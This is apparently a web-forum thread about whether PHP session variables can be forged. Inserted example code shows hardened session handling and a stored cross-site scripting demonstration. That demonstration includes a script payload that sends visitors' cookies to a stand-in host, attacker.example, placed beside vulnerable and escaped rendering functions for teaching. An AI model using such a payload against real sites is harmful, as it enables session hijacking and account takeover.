PHP Login Vulnerability, perhaps

On successful login I create a session cookie such as

$_SESSION['useris'] = $user;

Then, in restricted pages I check to see if this session variable is set; if not, I redirect to index.php.

How safe is this? Couldn’t someone fake the session cookie with someone else’s username if they know it?

If you know the session id, you can take over the session. Keyword IF.

You wouldn’t need to take over an existing session to get past that, though. If you knew what values are being stored in the session, you could just create them for yourself. In this case, if someone were able to figure out that the session variable is called useris and contains the user, then, knowing a user, they could access it. Of course, they’d need to know both the name of the session variable and a valid value for it to do that - again, something unlikely, since there is nothing visible on a web site to show what session variables it is using unless it is an identified open source script or the code is posted elsewhere (such as when asking a question about it) and can be matched up to the actual site using it.

The use of session_regenerate_id() would probably help a little bit.
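To make the advice above concrete, here is an added example (not code from any poster in this thread) of a login flow that keeps the original post’s `$_SESSION['useris']` check but adds the pieces that actually matter: session_regenerate_id() at the moment of login, strict-mode session ids so the server never adopts an id it did not issue, and HttpOnly/Secure cookie flags. It assumes PHP 7.3 or later (for the array form of session_set_cookie_params()), and the `$users` array standing in for a database lookup is constructed for the example.

```php
<?php
// Added example, not the original poster's code.
// Assumes PHP >= 7.3 and a $users map of username => password_hash() output
// standing in for a database table.
declare(strict_types=1);

function start_secure_session(): void
{
    // HttpOnly: JavaScript cannot read the cookie (limits damage from XSS).
    // Secure: cookie only travels over HTTPS. SameSite: not sent cross-site.
    session_set_cookie_params([
        'lifetime' => 0,
        'path'     => '/',
        'secure'   => true,
        'httponly' => true,
        'samesite' => 'Lax',
    ]);
    // Only accept the id from the cookie, and only ids this server issued.
    // Strict mode defeats session fixation (an attacker pre-setting PHPSESSID).
    ini_set('session.use_only_cookies', '1');
    ini_set('session.use_strict_mode', '1');
    session_start();
}

/**
 * Verify credentials and establish the logged-in session.
 * Returns true on success, false otherwise.
 */
function login(string $username, string $password, array $users): bool
{
    if (!isset($users[$username]) || !password_verify($password, $users[$username])) {
        return false;
    }
    // Discard the pre-authentication id: any id an attacker planted or
    // observed before login is worthless after this call.
    session_regenerate_id(true);
    $_SESSION['useris']     = $username;
    $_SESSION['login_time'] = time();
    return true;
}

/**
 * The check from the original post. The value lives server-side, keyed by the
 * session id; the client never sends 'useris' itself, only the id cookie.
 */
function require_login(): string
{
    if (empty($_SESSION['useris'])) {
        header('Location: index.php', true, 303);
        exit;
    }
    return $_SESSION['useris'];
}

function logout(): void
{
    $_SESSION = [];
    $p = session_get_cookie_params();
    // Expire the cookie in the browser as well as destroying server state.
    setcookie(session_name(), '', time() - 3600, $p['path'], $p['domain'], $p['secure'], $p['httponly']);
    session_destroy();
}

// Usage (constructed data, hypothetical names):
// start_secure_session();
// $users = ['alice' => password_hash('correct horse battery staple', PASSWORD_DEFAULT)];
// if (login($_POST['user'] ?? '', $_POST['pass'] ?? '', $users)) {
//     header('Location: members.php'); exit;
// }
// // in members.php, after start_secure_session():
// $who = require_login();
```

The important property is that nothing the browser holds says "useris"; it holds only an opaque id, so the only attack surface is obtaining or planting that id, which is what regenerate-on-login, strict mode and the cookie flags are there to shrink.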

I was under the impression that a session cookie only contained the identifier needed to access the actual session, stored on the server…

So storing a users information within a $_SESSION variable, would be more secure than storing the information within a $_COOKIE variable… since the data in the $_COOKIE comes directly from the user and should be considered “unsafe”…

I was under the impression that a session cookie only contained the identifier needed to access the actual session, stored on the server…

So storing a users information within a $_SESSION variable, would be more secure than storing the information within a $_COOKIE variable… since the data in the $_COOKIE comes directly from the user and should be considered “unsafe”…

This is what I thought too.

You wouldn’t need to take over an existing session to get past that, though. If you knew what values are being stored in the session, you could just create them for yourself.

And these values would override the ones on the server?

Now that I’d like to see. Sessions are not user data, and they cannot be entered by users. The only thing about a session that is stored on the user’s computer is the session_id, a unique identifier for that session. The user has no means to say: I know there is an index called “useris” and I would like to override its value with “x”. The user will never see “useris”, because that doesn’t get communicated and stays server-side.

There is, however, the possibility that your scripts aren’t secured against session hijacking, a very real threat in most applications. Roughly explained, an attacker will plant a script in your application because you didn’t filter the input, and use JavaScript to read out and submit the session_id of other users. From there, it’s usually trivial to get an admin session, and from there, it gets easy to break an application.

I’m guessing, as felgall is a smart man, that he was accidentally talking about cookies instead of sessions.
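The hijacking route described in the previous post, as an added example that is not part of any post in the thread: a comment field whose contents are echoed back unescaped, the kind of payload an attacker would store in it (constructed for the example, pointing at a hypothetical attacker.example host), and the hardened rendering that encodes at output time. The payload reads document.cookie, which is exactly why the session cookie should also carry the HttpOnly flag as a second layer.

```php
<?php
// Added example, not from the original thread.
// Demonstrates stored XSS used to exfiltrate the session id, and the fix.
declare(strict_types=1);

// Constructed attacker input for a comment field. attacker.example is a
// hypothetical host; the script sends every visitor's cookies there.
const ATTACKER_COMMENT =
    "great post<script>new Image().src='https://attacker.example/c?'"
    . "+encodeURIComponent(document.cookie)</script>";

/**
 * Vulnerable: stored user input is inserted into HTML verbatim, so the
 * <script> tag runs in every visitor's browser, including the admin's.
 */
function render_comment_vulnerable(string $comment): string
{
    return "<div class=\"comment\">$comment</div>";
}

/**
 * Hardened: encode for the HTML body context at the point of output.
 * '<' becomes '&lt;', so the browser shows the payload as text.
 */
function render_comment_safe(string $comment): string
{
    return '<div class="comment">'
        . htmlspecialchars($comment, ENT_QUOTES | ENT_HTML5, 'UTF-8')
        . '</div>';
}

/**
 * Crude check for the example: does the rendered markup still contain an
 * executable script element? Real defence is the encoding above, not this.
 */
function contains_script_tag(string $html): bool
{
    return (bool) preg_match('/<script\b/i', $html);
}

// Demonstration (uses the constructed payload above):
// contains_script_tag(render_comment_vulnerable(ATTACKER_COMMENT)) === true
// contains_script_tag(render_comment_safe(ATTACKER_COMMENT))       === false
```

Even with correct encoding everywhere, set the session cookie HttpOnly (session_set_cookie_params(['httponly' => true, ...]) before session_start()), so that a single missed escape does not hand document.cookie, and with it the session id, to whoever injected the script.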